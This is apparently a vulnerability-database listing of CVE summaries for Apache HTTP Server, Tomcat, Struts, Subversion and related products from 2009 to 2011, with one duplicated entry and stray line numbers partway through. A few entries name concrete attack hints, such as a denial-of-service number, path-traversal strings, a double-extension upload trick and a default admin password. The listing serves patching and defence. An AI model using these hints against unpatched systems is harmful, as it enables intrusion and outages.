| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
13487| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
13488| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
13489| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
13490| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
13491| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
13492| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
13493| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
13494| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
13495| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
13496| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
13497| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
13498| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
13499| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
13500| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
13501| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
13502| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
13503| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
13504| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
13505| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
13506| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
13507| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
13508| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
13509| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
13510| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
13511| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
13512| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
13513| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
13514| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
13515| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
13516| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
13517| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
13518| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
13519| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
13520| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
13521| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
13522| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
13523| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
13524| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13525| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
13526| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
13527| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
13528| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
13529| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
13530| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
13531| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
13532| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
13533| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
13534| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
13535| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
13536| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
13537| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
13538| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
13539| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
13540| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
13541| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
13542| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
13543| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
13544| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
